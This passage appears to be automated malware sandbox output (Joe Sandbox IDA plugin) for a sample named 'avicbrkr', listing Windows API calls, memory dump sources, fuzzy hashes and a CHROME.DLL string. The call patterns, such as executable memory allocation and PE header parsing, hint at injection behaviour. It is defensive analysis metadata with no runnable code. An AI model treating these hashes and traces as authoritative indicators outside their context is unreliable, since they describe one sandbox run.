                      • Opcode Fuzzy Hash: c125926760b8969e3e12818e978880b3594deecd970be9a9d9bd5f01c09b817c
                      • Instruction Fuzzy Hash: 87F0E5772022149F8B227F1AAD8A879F7ADEB9936471601DBE91193311CF727C01C7E0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • GetModuleHandleA.KERNEL32(0039E065,00000000,0037B7B6,00000000,00000000,?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC), ref: 00376496
                      • TlsAlloc.KERNEL32(?,0037D9D1,?,0000005C,?,0037DDEC,?,?,0039E605,00000001,0039D2DC,00000000), ref: 003764A2
                        • Part of subcall function 00376361: RtlImageNtHeader.NTDLL(?), ref: 00376376
                        • Part of subcall function 00376361: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,0037D9D1,0037D9D1,00000000,?,0037D9D1,00000001,00000000,?,0037D9D1,?,0000005C), ref: 0037643C
                        • Part of subcall function 0037B5CD: HeapFree.KERNEL32(00000000,?,00000000), ref: 0037B634
                      Strings
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Alloc$FreeHandleHeaderHeapImageModuleVirtual
                      • String ID: CHROME.DLL
                      • API String ID: 1533827403-1627437769
                      • Opcode ID: b98056b359a79f908a4ccfa11e4551f39febbf4c4cae30e504452222e08a98fe
                      • Instruction ID: 7696f15e48bd0b4218cb004095cfca816886f45c3ae4979c0598303de3e8de99
                      • Opcode Fuzzy Hash: b98056b359a79f908a4ccfa11e4551f39febbf4c4cae30e504452222e08a98fe
                      • Instruction Fuzzy Hash: C8E08635569A2067C93337697C5BBC9B6545B04B70F054242F91CA53D0C6B9488585A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00633659
                      • memcpy.NTDLL ref: 00633681
                        • Part of subcall function 00633D34: RtlNtStatusToDosError.NTDLL(00000000), ref: 00633D6C
                        • Part of subcall function 00633D34: SetLastError.KERNEL32(00000000), ref: 00633D73
                      • GetLastError.KERNEL32(00000010,00000218,00634E3D,00000100,?,00000318,00000008), ref: 00633698
                        • Part of subcall function 00633CF3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00633D20
                        • Part of subcall function 00633CF3: SetLastError.KERNEL32(00000000,?,006319D6,?,00000004,0063244E,00000004,?,?,?,?,006322FD,00000000,0063244E,CCCCFEEB,00000000), ref: 00633D27
                      • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00634E3D,00000100), ref: 0063377B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1217259032.00631000.00000020.sdmp, Offset: 00631000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_631000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$Last$Status$memcpymemset
                      • String ID:
                      • API String ID: 1551833903-0
                      • Opcode ID: 68ad9a529400012a31ee570ad98dd83c4040afae3d0b71acf164cc176c6d897e
                      • Instruction ID: f19fecd12654d3d7559ec45b81fa44a8a6a487e8cacc5df54b52ea16e8f97300
                      • Opcode Fuzzy Hash: 68ad9a529400012a31ee570ad98dd83c4040afae3d0b71acf164cc176c6d897e
                      • Instruction Fuzzy Hash: 81415FB1504301AFD761DF24DC42B9BB7EAAF98310F10892DF999C6351E730D9158BA6
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00388BDF
                      • memcpy.NTDLL ref: 00388C07
                        • Part of subcall function 00389524: RtlNtStatusToDosError.NTDLL(00000000), ref: 0038955C
                        • Part of subcall function 00389524: SetLastError.KERNEL32(00000000), ref: 00389563
                      • GetLastError.KERNEL32(00000010,00000218,003955FD,00000100,?,00000318,00000008), ref: 00388C1E
                        • Part of subcall function 003894E3: RtlNtStatusToDosError.NTDLL(C0000002), ref: 00389510
                        • Part of subcall function 003894E3: SetLastError.KERNEL32(00000000,?,00388DE7,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 00389517
                      • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,003955FD,00000100), ref: 00388D01
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Error$Last$Status$memcpymemset
                      • String ID:
                      • API String ID: 1551833903-0
                      • Opcode ID: c02d4cb18c1f0aea13c20ef30fdc36f708fd118352be85c04a1f28b37f67f8d0
                      • Instruction ID: 05caeede123d1409b12a6e5e8b0d344153f6189b1f5fc8eb4395c1e1487f723b
                      • Opcode Fuzzy Hash: c02d4cb18c1f0aea13c20ef30fdc36f708fd118352be85c04a1f28b37f67f8d0
                      • Instruction Fuzzy Hash: 1E4193B1504301AFDB22EF24DC41F9BBBF9BB98310F40492DF599CA291EB30D9148B62
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,0038FADF,00000000,00000000,00000004,00000000,?), ref: 0038F4E6
                        • Part of subcall function 003712EA: RtlAllocateHeap.NTDLL(00000000,00000000,00388635), ref: 003712F6
                      • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,0038FADF,00000000,00000000,00000004,00000000,?), ref: 0038F544
                      • lstrcpy.KERNEL32(00000000,00000008), ref: 0038F554
                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0038F560
                        • Part of subcall function 003712FF: HeapFree.KERNEL32(00000000,?,0038BAC1), ref: 0037130B
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: Heaplstrcpy$AllocateFreelstrlenmemcpy
                      • String ID:
                      • API String ID: 3360227210-0
                      • Opcode ID: 8f7036395cef4e68cec6fa844a1780a5ad2533f0f56c82e86d570bfd581150e9
                      • Instruction ID: 338e6b45ef731b2e46d84a8cf68f9806c79a80d138597ee771d4c903b656fcf8
                      • Opcode Fuzzy Hash: 8f7036395cef4e68cec6fa844a1780a5ad2533f0f56c82e86d570bfd581150e9
                      • Instruction Fuzzy Hash: FC217272504315EFCB23AF78CC59AAB7FBC9F4A790F1580A5F8059F212D635DA0187A0
                      Uniqueness

                      Uniqueness Score: -1,00%

                      APIs
                      • memset.NTDLL ref: 00386011
                      • memset.NTDLL ref: 00386028
                      • memset.NTDLL ref: 0038603F
                        • Part of subcall function 003836DE: CloseHandle.KERNEL32(00000000), ref: 003836E9
                        • Part of subcall function 003836DE: memset.NTDLL ref: 003836F8
                      • memset.NTDLL ref: 00386057
                      Memory Dump Source
                      • Source File: 00000010.00000002.1216935262.00371000.00000020.sdmp, Offset: 00371000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_16_2_371000_avicbrkr.jbxd
                      Similarity
                      • API ID: memset$CloseHandle
                      • String ID:
                      • API String ID: 1628094390-0
                      • Opcode ID: 0b0cd86c4de8a885383866b204d508500df37b6cbce926e7c36b5e08908b1c78
                      • Instruction ID: 9f4963b38038fbc32a583d86bdd39de01f0863872b02703ed16af38c818af2b3
                      • Opcode Fuzzy Hash: 0b0cd86c4de8a885383866b204d508500df37b6cbce926e7c36b5e08908b1c78
                      • Instruction Fuzzy Hash: 7C11A0B2900709BFCB22AFA1EC42E66B779FF09300B060558F94496912D773B9B19BD5
                      Uniqueness

                      Uniqueness Score: -1,00%